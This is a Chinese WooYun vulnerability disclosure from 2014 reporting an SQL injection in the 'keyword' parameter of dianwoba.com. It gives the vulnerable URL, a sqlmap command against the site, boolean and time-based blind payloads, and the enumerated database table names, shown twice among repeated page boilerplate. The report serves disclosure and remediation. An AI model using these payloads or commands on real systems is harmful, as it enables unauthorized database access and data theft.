点我吧主站SQL注射可致数据库信息泄露

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2014-053180

漏洞标题：点我吧主站SQL注射可致数据库信息泄露

漏洞作者： lxj616

提交时间：2014-03-09 12:25

修复时间：2014-03-19 12:26

公开时间：2014-03-19 12:26

漏洞类型：SQL注射漏洞

危害等级：中

自评Rank：16

漏洞状态：漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2014-03-09：细节已通知厂商并且等待厂商处理中
2014-03-19：厂商已经主动忽略漏洞，细节向公众公开

简要描述：

点我吧主站SQL注射可致数据库信息泄露 SQLMAP验证（仅演示取得数据表名称，不再继续深入）望尽快到乌云认领漏洞并修复

详细说明：

漏洞位置：
www.dianwoba.com/comment!getAllMicroblog.do?keyword=0&keywordtype=1&page=1&pagesize=10&showtype=2&start=0&t=1394325365091
参数keyword无过滤，直接SQLMAP可注射

C:\Users\Administrator>sqlmap.py -u "www.dianwoba.com/comment!getAllMicroblog.do?keyword=0&keywordtype=1&page=1&pagesize=10&showtype=2&start=0&t=1394325365091" -p keyword --tables

sqlmap identified the following injection points with a total of 71 HTTP(s) requests:
---
Place: GET
Parameter: keyword
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: keyword=0%' AND 7994=7994 AND '%'='&keywordtype=1&page=1&pagesize=10&showtype=2&start=0&t=1394325365091
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: keyword=0%' AND SLEEP(5) AND '%'='&keywordtype=1&page=1&pagesize=10&showtype=2&start=0&t=1394325365091
---
web application technology: Nginx, JSP
back-end DBMS: MySQL 5.0.11
Database: website
[104 tables]
+---------------------------------------+
| C3P0TestTable                         |
| a_lim_table1                          |
| a_lim_table1_14_26                    |
| a_table_cyk_all                       |
| a_table_sup                           |
| crm_address                           |
| crm_admin_operate_log                 |
| crm_after_sale                        |
| crm_b2bsups                           |
| crm_blacklist                         |
| crm_customer_service                  |
| crm_customer_service_status           |
| crm_gps_gprs_message                  |
| crm_gps_gprs_order                    |
| crm_gps_gprs_order_bak                |
| crm_mobile_city                       |
| crm_operation_log                     |
| crm_operation_log_bak                 |
| crm_operators                         |
| crm_order_his                         |
| crm_order_his_all                     |
| crm_peisong                           |
| crm_peisong_bak                       |
| crm_peisong_paiban                    |
| crm_peisongtuan                       |
| crm_peisongtuan_bak                   |
| crm_phone                             |
| crm_system_parameters                 |
| crm_viplist                           |
| crm_youhui_phone                      |
| g_building                            |
| g_item                                |
| g_item_type                           |
| g_market                              |
| g_queue_time                          |
| gps_whereru                           |
| w_coupon                              |
| w_coupon_user                         |
| wm_address                            |
| wm_address_express                    |
| wm_app_message                        |
| wm_app_message_copy                   |
| wm_app_message_copy1                  |
| wm_app_phoneid                        |
| wm_app_tuisong                        |
| wm_bbs_rating_integral                |
| wm_bbs_rating_level                   |
| wm_bbs_rating_type                    |
| wm_gorder                             |
| wm_gprs_printers                      |
| wm_gprsprint_order                    |
| wm_gprsprint_phoneno                  |
| wm_group                              |
| wm_group_department                   |
| wm_group_member                       |
| wm_group_operation_log                |
| wm_images_sup                         |
| wm_integral                           |
| wm_ipforward                          |
| wm_joincity                           |
| wm_kuaike_member                      |
| wm_liansuo                            |
| wm_market_cj                          |
| wm_market_liansuo                     |
| wm_market_mail                        |
| wm_market_product                     |
| wm_market_product_prop                |
| wm_market_property                    |
| wm_market_provider                    |
| wm_market_type                        |
| wm_market_type2                       |
| wm_member                             |
| wm_member_consume                     |
| wm_member_day                         |
| wm_menu                               |
| wm_menu_class                         |
| wm_microblog_main                     |
| wm_microblog_reply                    |
| wm_money_application                  |
| wm_money_jftomoney                    |
| wm_money_record                       |
| wm_moneyuse_log                       |
| wm_notice                             |
| wm_order                              |
| wm_order_detail                       |
| wm_order_his                          |
| wm_order_id                           |
| wm_order_wcps20140209                 |
| wm_pack_dic                           |
| wm_package_menu                       |
| wm_package_rule                       |
| wm_package_submenu                    |
| wm_pay_log                            |
| wm_prize                              |
| wm_prize_record                       |
| wm_shop_class                         |
| wm_sixin                              |
| wm_sixin_read                         |
| wm_sup_info                           |
| wm_supclass                           |
| wm_supplier                           |
| wm_supplier_favorite                  |
| wm_wuliu                              |
| wm_youhui                             |
+---------------------------------------+
Database: information_schema
[28 tables]
+---------------------------------------+
| CHARACTER_SETS                        |
| COLLATIONS                            |
| COLLATION_CHARACTER_SET_APPLICABILITY |
| COLUMNS                               |
| COLUMN_PRIVILEGES                     |
| ENGINES                               |
| EVENTS                                |
| FILES                                 |
| GLOBAL_STATUS                         |
| GLOBAL_VARIABLES                      |
| KEY_COLUMN_USAGE                      |
| PARTITIONS                            |
| PLUGINS                               |
| PROCESSLIST                           |
| PROFILING                             |
| REFERENTIAL_CONSTRAINTS               |
| ROUTINES                              |
| SCHEMATA                              |
| SCHEMA_PRIVILEGES                     |
| SESSION_STATUS                        |
| SESSION_VARIABLES                     |
| STATISTICS                            |
| TABLES                                |
| TABLE_CONSTRAINTS                     |
| TABLE_PRIVILEGES                      |
| TRIGGERS                              |
| USER_PRIVILEGES                       |
| VIEWS                                 |
+---------------------------------------+

望尽快到乌云认领漏洞并修复

漏洞证明：

C:\Users\Administrator>sqlmap.py -u "www.dianwoba.com/comment!getAllMicroblog.do?keyword=0&keywordtype=1&page=1&pagesize=10&showtype=2&start=0&t=1394325365091" -p keyword --tables

sqlmap identified the following injection points with a total of 71 HTTP(s) requests:
---
Place: GET
Parameter: keyword
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: keyword=0%' AND 7994=7994 AND '%'='&keywordtype=1&page=1&pagesize=10&showtype=2&start=0&t=1394325365091
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: keyword=0%' AND SLEEP(5) AND '%'='&keywordtype=1&page=1&pagesize=10&showtype=2&start=0&t=1394325365091
---
web application technology: Nginx, JSP
back-end DBMS: MySQL 5.0.11
Database: website
[104 tables]
+---------------------------------------+
| C3P0TestTable                         |
| a_lim_table1                          |
| a_lim_table1_14_26                    |
| a_table_cyk_all                       |
| a_table_sup                           |
| crm_address                           |
| crm_admin_operate_log                 |
| crm_after_sale                        |
| crm_b2bsups                           |
| crm_blacklist                         |
| crm_customer_service                  |
| crm_customer_service_status           |
| crm_gps_gprs_message                  |
| crm_gps_gprs_order                    |
| crm_gps_gprs_order_bak                |
| crm_mobile_city                       |
| crm_operation_log                     |
| crm_operation_log_bak                 |
| crm_operators                         |
| crm_order_his                         |
| crm_order_his_all                     |
| crm_peisong                           |
| crm_peisong_bak                       |
| crm_peisong_paiban                    |
| crm_peisongtuan                       |
| crm_peisongtuan_bak                   |
| crm_phone                             |
| crm_system_parameters                 |
| crm_viplist                           |
| crm_youhui_phone                      |
| g_building                            |
| g_item                                |
| g_item_type                           |
| g_market                              |
| g_queue_time                          |
| gps_whereru                           |
| w_coupon                              |
| w_coupon_user                         |
| wm_address                            |
| wm_address_express                    |
| wm_app_message                        |
| wm_app_message_copy                   |
| wm_app_message_copy1                  |
| wm_app_phoneid                        |
| wm_app_tuisong                        |
| wm_bbs_rating_integral                |
| wm_bbs_rating_level                   |
| wm_bbs_rating_type                    |
| wm_gorder                             |
| wm_gprs_printers                      |
| wm_gprsprint_order                    |
| wm_gprsprint_phoneno                  |
| wm_group                              |
| wm_group_department                   |
| wm_group_member                       |
| wm_group_operation_log                |
| wm_images_sup                         |
| wm_integral                           |
| wm_ipforward                          |
| wm_joincity                           |
| wm_kuaike_member                      |
| wm_liansuo                            |
| wm_market_cj                          |
| wm_market_liansuo                     |
| wm_market_mail                        |
| wm_market_product                     |
| wm_market_product_prop                |
| wm_market_property                    |
| wm_market_provider                    |
| wm_market_type                        |
| wm_market_type2                       |
| wm_member                             |
| wm_member_consume                     |
| wm_member_day                         |
| wm_menu                               |
| wm_menu_class                         |
| wm_microblog_main                     |
| wm_microblog_reply                    |
| wm_money_application                  |
| wm_money_jftomoney                    |
| wm_money_record                       |
| wm_moneyuse_log                       |
| wm_notice                             |
| wm_order                              |
| wm_order_detail                       |
| wm_order_his                          |
| wm_order_id                           |
| wm_order_wcps20140209                 |
| wm_pack_dic                           |
| wm_package_menu                       |
| wm_package_rule                       |
| wm_package_submenu                    |
| wm_pay_log                            |
| wm_prize                              |
| wm_prize_record                       |
| wm_shop_class                         |
| wm_sixin                              |
| wm_sixin_read                         |
| wm_sup_info                           |
| wm_supclass                           |
| wm_supplier                           |
| wm_supplier_favorite                  |
| wm_wuliu                              |
| wm_youhui                             |
+---------------------------------------+
Database: information_schema
[28 tables]
+---------------------------------------+
| CHARACTER_SETS                        |
| COLLATIONS                            |
| COLLATION_CHARACTER_SET_APPLICABILITY |
| COLUMNS                               |
| COLUMN_PRIVILEGES                     |
| ENGINES                               |
| EVENTS                                |
| FILES                                 |
| GLOBAL_STATUS                         |
| GLOBAL_VARIABLES                      |
| KEY_COLUMN_USAGE                      |
| PARTITIONS                            |
| PLUGINS                               |
| PROCESSLIST                           |
| PROFILING                             |
| REFERENTIAL_CONSTRAINTS               |
| ROUTINES                              |
| SCHEMATA                              |
| SCHEMA_PRIVILEGES                     |
| SESSION_STATUS                        |
| SESSION_VARIABLES                     |
| STATISTICS                            |
| TABLES                                |
| TABLE_CONSTRAINTS                     |
| TABLE_PRIVILEGES                      |
| TRIGGERS                              |
| USER_PRIVILEGES                       |
| VIEWS                                 |
+---------------------------------------+

望尽快到乌云认领漏洞并修复

修复方案：

加强参数过滤
望尽快到乌云认领漏洞并修复

版权声明：转载请注明来源 lxj616@乌云

漏洞回应

厂商回应：

危害等级：无影响厂商忽略

忽略时间：2014-03-19 12:26

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2014-053180

漏洞标题：点我吧主站SQL注射可致数据库信息泄露

相关厂商：dianwoba.com

漏洞作者： lxj616

提交时间：2014-03-09 12:25

修复时间：2014-03-19 12:26

公开时间：2014-03-19 12:26

漏洞类型：SQL注射漏洞

危害等级：中

自评Rank：16

漏洞状态：漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 lxj616@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2014-053180

漏洞标题：点我吧主站SQL注射可致数据库信息泄露

相关厂商：dianwoba.com

漏洞作者： lxj616

提交时间：2014-03-09 12:25

修复时间：2014-03-19 12:26

公开时间：2014-03-19 12:26

漏洞类型：SQL注射漏洞

危害等级：中

自评Rank：16

漏洞状态：漏洞已经通知厂商但是厂商忽略漏洞

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2014-053180"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 lxj616@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞概要关注数(24) 关注此漏洞

Tags标签：无

4人收藏收藏
分享漏洞：